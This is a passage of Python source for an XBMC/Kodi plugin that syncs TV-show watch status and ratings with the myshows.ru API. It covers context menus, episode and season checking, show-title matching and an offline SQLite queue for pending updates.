'?action='+action+'&mode=41&sort=friends'),\n", " (__language__(30126) % (action), sys.argv[0] + '?action='+action+'&mode=41&sort=followers')]\n", " for temmp in menu:\n", " sys_url=temmp[1].encode('utf-8')\n", " title=temmp[0].encode('utf-8')\n", "\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=str(jdata['avatar']+'0'))\n", " item.setInfo( type='Video', infoLabels={'Title': title} )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", " if jdata['gender']=='m':\n", " stats=[__language__(30128) % (str(jdata['stats']['watchedDays'])),\n", " __language__(30129) % (str(jdata['stats']['watchedEpisodes'])),\n", " __language__(30130) % (str(jdata['stats']['watchedHours'])),\n", " __language__(30131) % (str(jdata['stats']['remainingEpisodes']))]\n", " else:\n", " stats=[__language__(30132) % (str(jdata['stats']['watchedDays'])),\n", " __language__(30133) % (str(jdata['stats']['watchedEpisodes'])),\n", " __language__(30134) % (str(jdata['stats']['watchedHours'])),\n", " __language__(30135) % (str(jdata['stats']['remainingEpisodes']))]\n", "\n", "\n", " for temmp in stats:\n", " title=temmp.encode('utf-8')\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=str(jdata['avatar']+'0'))\n", " item.setInfo( type='Video', infoLabels={'Title': title} )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url='', listitem=item, isFolder=False)\n", "\n", "def Change_Status_Episode(showId, id, action, playcount, refresh_url, selftitle=None):\n", " Debug('[Change_Status_Episode]:'+str((showId, id, action, playcount, refresh_url, selftitle)))\n", " if action==None:\n", " if playcount=='0': action='check'\n", " else: action='uncheck'\n", "\n", " status_url='http://api.myshows.ru/profile/episodes/'+action+'/'+str(id)\n", " ok2=Data(cookie_auth, status_url, refresh_url).get()\n", " #Debug('[TEST][Change_Status_Episode]:ok2 '+str(ok2))\n", " if ok2:\n", " showMessage(__language__(30208), status_url.strip('http://api.myshows.ru/profile/episodes/'), 70)\n", " WatchedDB().onaccess()\n", " else:\n", " Debug('[Change_Status_Episode]: Not ok2! Starting offline check and adding!')\n", " if not showId: showId=0\n", " if not selftitle: selftitle=json.dumps({\"myshows_showId\":int(showId),\"myshows_id\":int(id)})\n", " if action=='check':\n", " WatchedDB().check(selftitle)\n", " else:\n", " try:\n", " WatchedDB()._delete(selftitle)\n", " except:\n", " Debug('[Change_Status_Episode] Nothing to delete.'+selftitle)\n", " return False\n", "\n", "def Change_Status_Show(showId, action, refresh_url):\n", " if action=='remove':\n", " dialog = xbmcgui.Dialog()\n", " ret=dialog.yesno(__language__(30209), __language__(30210))\n", " else:\n", " ret=True\n", " if ret:\n", " ok=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/'+action, refresh_url).get()\n", " if ok:showMessage(__language__(30208), showId+'/'+action)\n", "\n", "def Change_Status_Season(showId, seasonNumber, action, refresh_url):\n", " #showMessage(__language__(30211), __language__(30212))\n", " data= get_url(cookie_auth, 'http://api.myshows.ru/shows/'+showId)\n", " eps_string=''\n", " jdata = json.loads(data)\n", " for id in jdata['episodes']:\n", " sNum=str(jdata['episodes'][id]['seasonNumber'])\n", " if seasonNumber==sNum:\n", " eps_string=eps_string+str(id)+','\n", " ok=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/episodes?'+action+'='+eps_string.rstrip(','), refresh_url).get()\n", " if ok:showMessage(__language__(30208), showId+'/episodes?'+action+'='+eps_string)\n", "\n", "def Rate(showId, id, refresh_url, selftitle=None):\n", " ratewindow=__settings__.getSetting(\"ratewindow\")\n", " rate=['5', '4', '3', '2', '1', unicode(__language__(30205))]\n", " if id=='0':\n", " rate_item=__language__(30213)+' '+showId\n", " else:\n", " rate_item=__language__(30214)+' '+id\n", " if ratewindow=='true':\n", " dialog = xbmcgui.Dialog()\n", " ret = dialog.select(__language__(30215) % rate_item, rate)\n", " else:\n", " ret=rateMedia(showId, id, __language__(30215) % rate_item)\n", " if ret:\n", " ret=int(ret)-1\n", " if ret>-1 and ret<5:\n", " if id=='0':\n", " rate_url=('http://api.myshows.ru/profile/shows/'+showId+'/rate/'+rate[ret])\n", " else:\n", " rate_url=('http://api.myshows.ru/profile/episodes/rate/'+rate[ret]+'/'+id)\n", " ok=Data(cookie_auth, rate_url, refresh_url).get()\n", " #Debug('[TEST][Rate]:ok '+str(ok))\n", " if ok:\n", " showMessage(__language__(30208), rate_url.strip('http://api.myshows.ru/profile/'))\n", " WatchedDB().onaccess()\n", " else:\n", " Debug('[Rate]: Not ok! Starting offline check and adding!')\n", " if not selftitle: selftitle=json.dumps({\"myshows_showId\":int(showId),\"myshows_id\":int(id)})\n", " WatchedDB().check(selftitle,int(rate[ret]))\n", " return False\n", " if getSettingAsBool('ratekinopoisk') and id=='0' and ok:\n", " jload=Data(cookie_auth, 'http://api.myshows.ru/shows/'+showId).get()\n", " if jload:\n", " jdata = json.loads(jload)\n", " title=jdata['title'].encode('utf-8')\n", " try: titleAlt=jdata['ruTitle'].encode('utf-8')\n", " except:titleAlt=None\n", " year=jdata['year']\n", " kinopoiskId=jdata['kinopoiskId']\n", " kinorate(title,year,titleAlt,kinopoiskId)\n", " return True\n", "\n", "def FakeRate(title):\n", " if getSettingAsBool(\"scrobrate\"):\n", " ratewindow=__settings__.getSetting(\"ratewindow\")\n", " rate=['5', '4', '3', '2', '1', unicode(__language__(30205))]\n", " rate_item=__language__(30520)\n", " if ratewindow=='true':\n", " dialog = xbmcgui.Dialog()\n", " ret = dialog.select(rate_item, rate)\n", " if ret>-1:\n", " ret=int(ret)+1\n", " else:\n", " rate_item=titlesync(title)\n", " ret=rateMedia(None, None, rate_item)\n", " if ret: ret=int(ret)\n", " else:\n", " ret=False\n", " if ret>0 and ret<6 or ret==None and not getSettingAsBool(\"rateandcheck\") or ret==False:\n", " db=WatchedDB()\n", " if ret==None or ret==False: rating=0\n", " else:\n", " rating=int(rate[int(ret)-1])\n", " db.check(title,rating)\n", " return True\n", "\n", "def Favorite(id, refresh_url):\n", " dialog = xbmcgui.Dialog()\n", " items=[__language__(30217), __language__(30218), __language__(30219), __language__(30220), unicode(__language__(30205))]\n", " actions_fi=['favorites', 'favorites', 'ignored', 'ignored', '']\n", " actions_ar=['add', 'remove', 'add', 'remove', '']\n", " ret = dialog.select(__language__(30216) % id, items)\n", " if ret!=items.index(unicode(__language__(30205))):\n", " fav_url=actions_fi[ret]+'/'+actions_ar[ret]+'/'+str(id)\n", " Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/'+fav_url, refresh_url).get()\n", " showMessage(__language__(30208), fav_url)\n", "\n", "def ContextMenuItems(sys_url, refresh_url, ifstat=None):\n", " myshows_dict=[]\n", " #Debug('[ContextMenuItems] '+unicode(sys.argv))\n", " if mode >= 10 and mode <=19 or mode==100 or sort and mode in (27,28) or mode==41 and sort and action:\n", " menu=[__language__(30227)+'|:|'+sys_url+'4',\n", " __language__(30300)+'|:|'+sys_url+'0&action=watching'+refresh_url,\n", " __language__(30301)+'|:|'+sys_url+'0&action=later'+refresh_url,\n", " __language__(30302)+'|:|'+sys_url+'0&action=cancelled'+refresh_url,\n", " __language__(30315)+'|:|'+sys_url+'5',\n", " __language__(30303)+'|:|'+sys_url+'1&id=0',\n", " __language__(30304)+'|:|'+sys_url+'0&action=remove'+refresh_url,\n", " __language__(30319)+'|:|'+sys_url+'6',]\n", " elif mode==20:\n", " menu=[__language__(30227)+'|:|'+sys_url+'4',\n", " __language__(30311)+'|:|'+sys_url+'9',\n", " __language__(30305)+'|:|'+sys_url+'0&action=check'+refresh_url,\n", " __language__(30306)+'|:|'+sys_url+'0&action=uncheck'+refresh_url,\n", " __language__(30319)+'|:|'+sys_url+'6',\n", " __language__(30315)+'|:|'+sys_url+'5',\n", " __language__(30310)+'|:|'+sys_url+'201',\n", " __language__(30318)+'|:|'+sys_url+'71',\n", " __language__(30228)+'|:|'+sys_url+'7',\n", " __language__(30314)+'|:|'+sys_url+'8',]\n", " elif mode==40:\n", " menu=[__language__(30300)+'|:|'+sys_url+'0&action=watching'+refresh_url,\n", " __language__(30301)+'|:|'+sys_url+'0&action=later'+refresh_url,\n", " __language__(30302)+'|:|'+sys_url+'0&action=cancelled'+refresh_url,\n", " __language__(30319)+'|:|'+sys_url+'6']\n", " elif mode==25 or not sort and mode in (27,28):\n", " menu=[__language__(30227)+'|:|'+sys_url+'4',\n", " __language__(30305)+'|:|'+sys_url+'0&action=check'+refresh_url,\n", " __language__(30306)+'|:|'+sys_url+'0&action=uncheck'+refresh_url,\n", " __language__(30317)+'|:|'+sys_url+'2',\n", " __language__(30319)+'|:|'+sys_url+'6',\n", " __language__(30308)+'|:|'+sys_url+'1'+refresh_url,\n", " __language__(30318)+'|:|'+sys_url+'71',\n", " __language__(30310)+'|:|'+sys_url+'201',\n", " __language__(30228)+'|:|'+sys_url+'200',]\n", " elif mode in (50,) and not sort:\n", " menu=[__language__(30227)+'|:|'+sys_url,\n", " __language__(30310)+'|:|'+sys_url+'1',\n", " __language__(30311)+'|:|'+sys_url+'2',\n", " __language__(30318)+'|:|'+sys_url+'71',\n", " __language__(30228)+'|:|'+sys_url+'0']\n", " elif mode==50 and sort:\n", " menu=[__language__(30314)+'|:|'+sys_url+'0']\n", " elif mode in (51,):\n", " menu=[]\n", " if ifstat==True: menu.append(__language__(30312)+'|:|'+sys_url+'02')\n", " elif ifstat==False: menu.append(__language__(30313)+'|:|'+sys_url+'01')\n", " menu.extend([__language__(30227)+'|:|'+sys_url,\n", " __language__(30311)+'|:|'+sys_url+'2',\n", " __language__(30318)+'|:|'+sys_url+'71',\n", " __language__(30228)+'|:|'+sys_url+'0'])\n", "\n", " for s in menu: myshows_dict.append([s.split('|:|')[0],'XBMC.RunPlugin('+s.split('|:|')[1]+')'])\n", " return myshows_dict\n", "\n", "class SyncXBMC():\n", " def __init__(self, inner=None, rating=None):\n", " self.menu,self.rating,self.title=None,None,title\n", " self.useTVDB=useTVDB\n", " if not inner: self.action=action\n", " else:\n", " self.action='check'\n", " self.title=str(inner)\n", " self.rating=rating\n", " self.jloadshows=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/').get()\n", " if self.jloadshows:\n", " self.jdatashows = json.loads(self.jloadshows)\n", " else: return\n", " if self.action in ['check']:\n", " self.match=json.loads(self.title)\n", " if self.useTVDB:\n", " from search.scrapers import Scrapers\n", " self.TVDB=Scrapers()\n", " else:\n", " self.menu=self.GetFromXBMC()\n", "\n", " def doaction_simple(self):\n", " id=None\n", " showId=None\n", " if self.match and 'showtitle' in self.match:\n", " showId=self.showtitle2showId()\n", " if self.match and 'date' in self.match and not 'episode' in self.match:\n", " id, self.match['season'],self.match['episode']=date2SE(showId, self.match['date'])\n", " if showId:\n", " if 'season' in self.match and 'episode' in self.match:\n", " Debug('[doaction] Getting the id of S%sE%s' % (str(self.match['season']),str(self.match['episode'])))\n", " id=self.getid(showId, self.match['season'],self.match['episode'],self.match['label'])\n", " Debug('[doaction][showId]: '+str(showId)+' [doaction][id]: '+str(id))\n", " return showId, id\n", "\n", " def doaction(self):\n", " friend_xbmc()\n", " if self.action=='check':\n", " if 'myshows_id' in self.match:\n", " showId, id=self.match['myshows_showId'],self.match['myshows_id']\n", " else:\n", " showId, id=self.doaction_simple()\n", " if __settings__.getSetting(\"label\")=='true' and not id:\n", " if 'file' in self.match: self.match['label']=self.match['file']\n", " idlist=[]\n", " if 'label' in self.match and re.search('.*?\\.avi|mp4|mkv|flv|mov|vob|wmv|ogm|asx|mpg|mpeg|avc|vp3|fli|flc|m4v$', self.match['label'], re.I | re.DOTALL):\n", " self.match['label']=self.match['label'].replace(os.path.dirname(self.match['label']),'').encode('utf-8','ignore').lstrip('\\\\/')\n", " self.old_match=self.match\n", " self.match=filename2match(self.match['label'])\n", " showId, id=self.doaction_simple()\n", " if not id:\n", " Debug('[doaction] Trying to find filename on myshows.ru: '+self.old_match['label'])\n", " data=Data(cookie_auth, 'http://api.myshows.ru/shows/search/file/?q='+urllib.quote_plus(self.old_match['label'])).get()\n", " if data:\n", " jdata=json.loads(data)\n", " showId=jdata['show']['id']\n", " ids=jdata['show']['episodes']\n", " for x in ids:\n", " idlist.append(x)\n", " if len(idlist)==1:\n", " id=idlist[0]\n", " #Debug('[doaction] [filename2match] '+unicode(self.match))\n", " if showId or id:\n", " if not id and 'season' in self.match and 'episode' in self.match:\n", " Debug('[doaction2] Getting the id of S%sE%s' % (str(self.match['season']),str(self.match['episode'])))\n", " id=self.getid(showId, self.match['season'],self.match['episode'],self.match['label'])\n", " if id:\n", " if self.rating:\n", " rate_url=('http://api.myshows.ru/profile/episodes/rate/'+str(self.rating)+'/'+str(id))\n", " d=Data(cookie_auth, rate_url, 'http://api.myshows.ru/profile/shows/'+str(showId)+'/').get()\n", " #Debug('[TEST][self.rating]: Rate answer %s' % (str(d)))\n", " if self.rating or self.rating==0:\n", " #xbmc.sleep(500)\n", " status_url='http://api.myshows.ru/profile/episodes/check/'+str(id)\n", " c=Data(cookie_auth, status_url, 'http://api.myshows.ru/profile/shows/'+str(showId)+'/').get()\n", " #Debug('[TEST][self.rating]: Check answer %s' % (str(c)))\n", " return 1\n", " rateOK, scrobrate, rateandcheck=False, __settings__.getSetting(\"scrobrate\"), __settings__.getSetting(\"rateandcheck\")\n", " if scrobrate=='true':\n", " #Debug('[TEST][doaction]: Start rateOK')\n", " rateOK=Rate(str(showId), str(id), 'http://api.myshows.ru/profile/shows/'+str(showId)+'/', self.title)\n", " #Debug('[TEST][doaction]: rateOK '+str(rateOK))\n", " else:\n", " rateOK=True\n", " if rateOK or rateandcheck=='false':\n", " if str(showId) not in self.jdatashows or self.jdatashows[str(showId)]['watchStatus']!='watching':\n", " #Debug('[doaction]: New show! Marking as watching')\n", " Change_Status_Show(str(showId), 'watching', 'http://api.myshows.ru/profile/shows/')\n", " xbmc.sleep(500)\n", " #Debug('[TEST][doaction]: Start Change_Status_Episode')\n", " #xbmc.sleep(500)\n", " Change_Status_Episode(showId, id, action, '0', 'http://api.myshows.ru/profile/shows/'+str(showId)+'/', self.title)\n", "\n", " def showtitle2showId(self):\n", " try:showtitle=self.match['showtitle'].decode('utf-8','ignore')\n", " except:showtitle=self.match['showtitle']\n", " if 'tvdb_id' in self.match:\n", " tvdb_id=self.match['tvdb_id']\n", " else:\n", " tvdb_id=None\n", "\n", " for showId in self.jdatashows:\n", " if showtitle==self.jdatashows[showId]['ruTitle'] or showtitle==self.jdatashows[showId]['title']:\n", " return int(showId)\n", " Debug('[showtitle2showId] '+unicode(showtitle))\n", " jload=Data(cookie_auth, 'http://api.myshows.ru/shows/search/?q=%s' % urllib.quote_plus(showtitle.encode('utf-8', 'ignore'))).get()\n", " if jload:\n", " jdata = json.loads(jload)\n", " Debug('[showtitle2showId] Search '+unicode(jload))\n", " else:\n", " if tvdb_id:\n", " html=get_html_source(\"http://thetvdb.com/api/33DBB309BB2B0ADB/series/%s/en.xml\" % tvdb_id)\n", " if re.findall('<SeriesName>(.+?)</SeriesName>', html, re.DOTALL)[0]:\n", " showtitle=re.findall('<SeriesName>(.+?)</SeriesName>', html, re.DOTALL)[0]\n", " Debug('[showtitle2showId] After [tvdb_id] '+showtitle)\n", " jload=Data(cookie_auth, 'http://api.myshows.ru/shows/search/?q=%s' % urllib.quote_plus(showtitle.encode('utf-8', 'ignore'))).get()\n", " if jload: jdata = json.loads(jload)\n", " else: return\n", " select_show=[]\n", " showIds=[]\n", " for showId in jdata:\n", " select_show.append((jdata[showId]['title'], showId, int(jdata[showId]['watching'])))\n", " if unicode(showtitle).lower()==unicode(jdata[showId]['ruTitle']).lower() or unicode(showtitle).lower()==unicode(jdata[showId]['title']).lower():\n", " showIds.append(showId)\n", " theshowId=showId\n", " if len(showIds)==1:\n", " return int(theshowId)\n", " select_show=sorted(select_show, key=lambda x: x[2], reverse=True)\n", " showtitles=[]\n", " showIds=[]\n", " showId=None\n", " for x in select_show:\n", " showtitles.append(x[0])\n", " showIds.append(x[1])\n", " if len(showIds)==1:\n", " showId=int(showIds[0])\n", " else:\n", " dialog = xbmcgui.Dialog()\n", " ret = dialog.select(unicode(__language__(30289)), showtitles)\n", " if ret!=-1:\n", " showId=int(showIds[ret])\n", " if showId:\n", " return showId\n", "\n", " def getid(self, showId, seasonNumber, episodeId, lable=None):\n", " data= Data(cookie_auth, 'http://api.myshows.ru/shows/'+str(showId)).get()\n", " jdata = json.loads(data)\n", " if seasonNumber and int(seasonNumber)>0 and episodeId:\n", " for id in jdata['episodes']:\n", " if jdata['episodes'][id]['seasonNumber']==int(seasonNumber) and jdata['episodes'][id]['episodeNumber']==int(episodeId):\n", " return int(id)\n", " episodes=[]\n", " for id in jdata['episodes']:\n", " episodes.append((id, jdata['episodes'][id]['title'], jdata['episodes'][id]['seasonNumber']))\n", " if lable and jdata['episodes'][id]['title']==lable:\n", " return int(id)\n", " if len(episodes)==1:\n", " return int(episodes)\n", " episodes=sorted(episodes, key=lambda x: x[0], reverse=True)\n", " eptitles=[]\n", " ids=[]\n", " for x in episodes:\n", " eptitles.append('S'+int_xx(x[2])+' '+x[1])\n", " ids.append(x[0])\n", " dialog = xbmcgui.Dialog()\n", " ret = dialog.select(unicode(__language__(30289)), eptitles)\n", " if ret!=-1:\n", " return int(ids[ret])\n", "\n", " def get_menu(self):\n", " if self.menu:\n", " return self.menu\n", " else:\n", " return self.GetFromXBMC()\n", "\n", " def list(self):\n", " self.menu=self.get_menu()\n", " for i in self.menu:\n", " item = xbmcgui.ListItem(i['title'], iconImage='DefaultFolder.png', thumbnailImage=i['thumbnail'])\n", " item=self.shows(i['title'],item)\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url='', listitem=item, isFolder=True)\n", "\n", " def shows(self, title, item, info=None, avatar=False):\n", " if not self.menu and not self.useTVDB:\n", " return item\n", "\n", " if self.useTVDB:\n", " #Debug('[shows][useTVDB]:'+info['tvshowtitle'])\n", " #Debug('[shows][useTVDB]:'+info['title'])\n", " try:info['title']=info['title'].decode('utf-8','ignore')\n", " except:pass\n", " try:info['tvshowtitle']=info['tvshowtitle'].decode('utf-8','ignore')\n", " except:pass\n", " meta=self.TVDB.scraper('tvdb', {'label':info['title'], 'search':[info['tvshowtitle'],info['title']], 'year':info['year']})\n", "\n", " if not meta:\n", " return item\n", "\n", " item=self.itemTVDB(item,meta,avatar)\n", " try:\n", " #if 1==1:\n", " #print str(meta)\n", " if 'title' in info:\n", " meta['info']['title']=info['title']\n", " if 'rating' in info:\n", " meta['info']['rating']=info['rating']\n", " if 'votes' in info:\n", " meta['info']['votes']=info['votes']\n", " if 'plot' in info:\n", " meta['info']['plot']=meta['info']['plot'].replace('&quot;','\"')+'\\r\\n'+info['plot']\n", " elif 'plot' in meta['info'] and meta['info']['plot']:\n", " meta['info']['plot']=meta['info']['plot'].replace('&quot;','\"')\n", " if 'playcount' in info:\n", " meta['info']['playcount']=info['playcount']\n", " if 'episode' in info:\n", " meta['info']['episode']=info['episode']\n", " #print str(meta)\n", "\n", " except:pass\n", " item.setInfo(type='Video', infoLabels=meta['info'] )\n", " return item\n", "\n", " self.menu=self.get_menu()\n", " for i in range(len(self.menu)):\n", " try:\n", " if title in self.menu[i]['title']:\n", " item.setProperty('fanart_image', self.menu[i]['fanart'])\n", "\n", " for studio_info in self.menu[i]['studio']:\n", " try: studio+=', '+studio_info\n", " except: studio=studio_info\n", " self.menu[i]['studio']=studio.encode('utf-8')\n", "\n", " for genre_info in self.menu[i]['genre']:\n", " try: genre+=', '+genre_info\n", " except: genre=genre_info\n", " self.menu[i]['genre']=genre.encode('utf-8')\n", "\n", " if info:\n", " self.menu[i]['title']=info['title']\n", " self.menu[i]['playcount']=0\n", " self.menu[i]['plot']=info['plot']+self.menu[i]['plot']\n", " break\n", " except:pass\n", " try: item.setInfo( type='Video', infoLabels=self.menu[i] )\n", " except: item.setInfo( type='Video', infoLabels=info)\n", "\n", " return item\n", "\n", " def episodes_meta(self, info):\n", " meta=self.TVDB.scraper('tvdb', {'label':info['label'], 'search':info['label'], 'year':str(info['year'])})\n", " if not meta: return\n", " banners=self.TVDB.scraper('tvdb', {'label':info['label'], 'search':info['label'], 'year':str(info['year']), 'season':True})\n", " return meta, banners\n", "\n", " def episodes(self, title, item, info, meta=None):\n", " if not self.menu and not self.useTVDB:\n", " return item\n", "\n", " if self.useTVDB and meta:\n", " item=self.itemTVDB(item,meta)\n", " try:\n", " #if 1==1:\n", " #print str(meta)\n", " meta['info']['title']=info['title']\n", " meta['info']['rating']=info['rating']\n", " meta['info']['votes']=info['votes']\n", " if 'playcount' in info:\n", " meta['info']['playcount']=info['playcount']\n", " if 'plot' in info and info['plot']:\n", " meta['info']['plot']=info['plot']\n", " except:pass\n", " item.setInfo(type='Video', infoLabels=meta['info'] )\n", " return item\n", "\n", " self.menu=self.get_menu()\n", " for i in range(len(self.menu)):\n", " if title in self.menu[i]['title']:\n", " #Debug('episodes:'+title+' '+str(self.menu[i]['title']))\n", " item.setProperty('fanart_image', self.menu[i]['fanart'])\n", " break\n", " item.setInfo( type='Video', infoLabels=info )\n", " return item\n", "\n", " def episode(self, title, seasonId, episodeNumber):\n", " self.menu=self.get_menu()\n", " if not self.menu:\n", " return False\n", " for i in range(len(self.menu)):\n", " if title in self.menu[i]['title']:\n", " for episode in self.menu[i]['episodes']:\n", " if episode['episode']==episodeNumber and episode['season']==seasonId:\n", " return True\n", " return False\n", "\n", " def episode_fanart(self, info):\n", " if self.useTVDB:\n", " meta=self.TVDB.scraper('tvdb', {'label':info['label'], 'search':info['label'], 'year':str(info['year'])})\n", "\n", " if not meta:\n", " return ''\n", " else:\n", " return meta['properties']['fanart_image']\n", "\n", " self.menu=self.get_menu()\n", " if not self.menu:\n", " return ''\n", " for i in range(len(self.menu)):\n", " try:\n", " if info['title'] in self.menu[i]['title']:\n", " return self.menu[i]['fanart']\n", " except:pass\n", " return ''\n", "\n", " def GetFromXBMC(self):\n", " from utilities import xbmcJsonRequest\n", " Debug('[Episodes Sync] Getting episodes from XBMC')\n", "\n", " shows = xbmcJsonRequest({'jsonrpc': '2.0', 'method': 'VideoLibrary.GetTVShows', 'params': {'properties': ['title', 'originaltitle', 'genre', 'year', 'rating', 'plot', 'studio', 'mpaa', 'cast', 'imdbnumber', 'premiered', 'votes', 'fanart', 'thumbnail', 'episodeguide', 'playcount', 'season', 'episode', 'tag']}, 'id': 0})\n", "\n", " # sanity check, test for empty result\n", " if not shows:\n", " Debug('[Episodes Sync] xbmc json request was empty.')\n", " return\n", "\n", " # test to see if tvshows key exists in xbmc json request\n", " if 'tvshows' in shows:\n", " shows = shows['tvshows']\n", " #Debug(\"[Episodes Sync] XBMC JSON Result: '%s'\" % str(shows))\n", " else:\n", " Debug(\"[Episodes Sync] Key 'tvshows' not found\")\n", " return\n", "\n", " for show in shows:\n", " show['episodes'] = []\n", "\n", " episodes = xbmcJsonRequest({'jsonrpc': '2.0', 'method': 'VideoLibrary.GetEpisodes', 'params': {'tvshowid': show['tvshowid'], 'properties': ['season', 'episode', 'playcount', 'uniqueid', 'file']}, 'id': 0})\n", " if 'episodes' in episodes:\n", " episodes = episodes['episodes']\n", "\n", " show['episodes'] = [x for x in episodes if type(x) == type(dict())]\n", "\n", " self.xbmc_shows = [x for x in shows if x['episodes']]\n", " return shows\n", "\n", " def itemTVDB(self, item, kwarg, avatar=False):\n", " #Debug('[itemTVDB]:meta '+str(kwarg))\n", " if 'title' in kwarg and kwarg['title']:\n", " item.setLabel(kwarg['title'])\n", "\n", " if 'label' in kwarg and kwarg['label']:\n", " item.setLabel2(kwarg['label'])\n", "\n", " if not avatar and 'icon' in kwarg and kwarg['icon']:\n", " item.setIconImage(kwarg['icon'])\n", "\n", " if not avatar and 'thumbnail' in kwarg and kwarg['thumbnail']:\n", " item.setThumbnailImage(kwarg['thumbnail'])\n", "\n", " if 'properties' in kwarg and kwarg['properties']:\n", " for key, value in kwarg['properties'].iteritems():\n", " item.setProperty(key, str(value))\n", "\n", " return item\n", "\n", "class WatchedDB:\n", " def __init__(self):\n", " dirname = xbmc.translatePath('special://temp')\n", " for subdir in ('xbmcup', sys.argv[0].replace('plugin://', '').replace('/', '')):\n", " dirname = os.path.join(dirname, subdir)\n", " if not xbmcvfs.exists(dirname):\n", " xbmcvfs.mkdir(dirname)\n", " self.dbfilename = os.path.join(dirname, 'data.db3')\n", " if not xbmcvfs.exists(self.dbfilename):\n", " creat_db(self.dbfilename)\n", " self.dialog = xbmcgui.Dialog()\n", "\n", " def _get(self, id):\n", " self._connect()\n", " Debug('[WatchedDB][_get]: Checking '+id)\n", " id=id.replace(\"'\",\"<&amp>\").decode('utf-8','ignore')\n", " self.where=\" where id='%s'\" % (id)\n", " #if 1==1:\n", " try:\n", " self.cur.execute('select rating from watched'+self.where)\n", " except:\n", " #else:\n", " self.cur.execute('create table watched(addtime integer, rating integer, id varchar(32) PRIMARY KEY)')\n", " self.cur.execute('select rating from watched'+self.where)\n", " res=self.cur.fetchone()\n", " self._close()\n", " return res[0] if res else None\n", "\n", " def _get_all(self):\n", " self._connect()\n", " self.cur.execute('select id, rating from watched order by addtime desc')\n", " res = [[unicode(x[0]).replace(\"<&amp>\",\"'\").encode('utf-8','ignore'),x[1]] for x in self.cur.fetchall()]\n", " self._close()\n", " return res\n", "\n", " def check(self, id, rating=0):\n", " ok1,ok3=None,None\n", " db_rating=self._get(id)\n", " title=titlesync(id)\n", " if getSettingAsBool(\"silentoffline\"):\n", " if db_rating==None and rating>=0:\n", " showMessage(__language__(30520),__language__(30522) % (str(rating)))\n", " ok1=True\n", " elif db_rating>=0 and rating!=db_rating:\n", " showMessage(__language__(30520),__language__(30523) % (str(rating)))\n", " ok3=True\n", " elif db_rating!=None and rating==db_rating:\n", " showMessage(__language__(30520),__language__(30524) % (str(rating)))\n", " else:\n", " if db_rating==None and rating>=0:\n", " ok1=self.dialog.yesno(__language__(30520),__language__(30525) % (str(rating)), str(title))\n", " elif db_rating and rating!=db_rating:\n", " ok3=self.dialog.yesno(__language__(30520),__language__(30526) % (str(db_rating), str(rating)),str(title))\n", " elif db_rating==0 and rating!=db_rating:\n", " ok3=True\n", " elif db_rating!=None and rating==db_rating:\n", " showMessage(__language__(30520),__language__(30527) % (str(rating)))\n", "\n", " Debug('[WatchedDB][check]: rating: %s DB: %s, ok1: %s, ok3: %s' % (str(rating), str(db_rating), str(ok1), str(ok3)))\n", "\n", " if ok1:\n", " self._add(id, rating)\n", " return True\n", " if ok3:\n", " self._delete(id)\n", " self._add(id, rating)\n", " return True\n", "\n", " def onaccess(self):\n", " #Debug('[WatchedDB][onaccess]: Start')\n", " self._connect()\n", " self.cur.execute('select count(id) from watched')\n", " x=self.cur.fetchone()\n", " res=int(x[0])\n", " self._close()\n", " i=0\n", "\n", " if res>0:\n", " #Debug('[WatchedDB][onaccess]: Found %s' % (str(res)))\n", " silentofflinesend=getSettingAsBool('silentofflinesend')\n", " if not silentofflinesend: ok2=self.dialog.yesno(__language__(30521),__language__(30528) % (str(res)), __language__(30529))\n", " else: ok2=True\n", " if ok2:\n", " for id,rating in self._get_all():\n", " j=SyncXBMC(id,int(rating)).doaction()\n", " i=i+int(j)\n", " self._delete(id)\n", " showMessage(__language__(30521),__language__(30530) % (i))\n", " else:\n", " ok2=self.dialog.yesno(__language__(30521),__language__(30531) % (str(res)))\n", " if ok2:\n", " for id,rating in self._get_all():\n", " self._delete(id)\n", " return res\n", "\n", " def _add(self, id, rating=0):\n", " self._connect()\n", " id=id.replace(\"'\",\"<&amp>\").decode('utf-8','ignore')\n", " Debug('[WatchedDB][_add]: Adding %s with rate %d' % (id, rating))\n", " self.cur.execute('insert into watched(addtime, rating, id) values(?,?,?)', (int(time.time()), int(rating), id))\n", " self.db.commit()\n", " self._close()\n", "\n", " def _delete(self, id):\n", " self._connect()\n", " id=id.replace(\"'\",\"<&amp>\").decode('utf-8','ignore')\n", " self.cur.execute(\"delete from watched where id=('\"+id+\"')\")\n", " self.db.commit()\n", " self._close()\n", "\n", " def _connect(self):\n", " self.db = sqlite.connect(self.dbfilename)\n", " self.cur = self.db.cursor()\n", "\n", " def _close(self):\n", " self.cur.close()\n", " self.db.close()\n", "\n", "def Test():\n", " #SyncXBMC()\n", " #RunPlugin='{\"mode\": \"60\", \"argv\": {\"content\": \"videos\"}}'\n", " #xbmc.executebuiltin('XBMC.RunPlugin('+sys.argv[0]+'?'+urllib.quote_plus(RunPlugin)+')')\n", " #print Rate('9237', '2031031', 'http://api.myshows.ru/profile/shows/9237/', True)\n", " #PluginStatus().use('myshows')\n", " '''\n", " import libtorrent\n", " for filename in xbmcvfs.listdir(r'D:\\torrents')[1]:\n", " filelist=[]\n", " tor=os.path.join('D:\\\\','torrents',filename)\n", " torrentFileInfo = libtorrent.torrent_info(tor)\n", " s=torrentFileInfo.files()\n", " for f in s:\n", " if '\\\\' not in f.path[f.path.find('\\\\')+1:]:\n", " filelist.append(f.path[f.path.find('\\\\')+1:])\n", " print 'filelist.append('+str(filelist)+')'\n", " pass'''\n", "\n", " #data={'item': {'label': u'\\u041a\\u043b\\u043e\\u0434 \\u0432 \\u043f\\u043e\\u043c\\u043e\\u0449\\u044c (2012)'}}\n", " #file=data['item'][\"label\"]\n", " #file=file.replace('.',' ').replace('_',' ').replace('[',' ').replace(']',' ').replace('(',' ').replace(')',' ').strip()\n", " #match=re.compile('(.+) (\\d{4})( |$)', re.I | re.IGNORECASE).findall(file)\n", " #if match:\n", " # data[\"title\"], data[\"year\"] = match[0][0],match[0][1]\n", " # data[\"type\"] = \"movie\"\n", " # data[\"year\"]=int(data[\"year\"])\n", " # 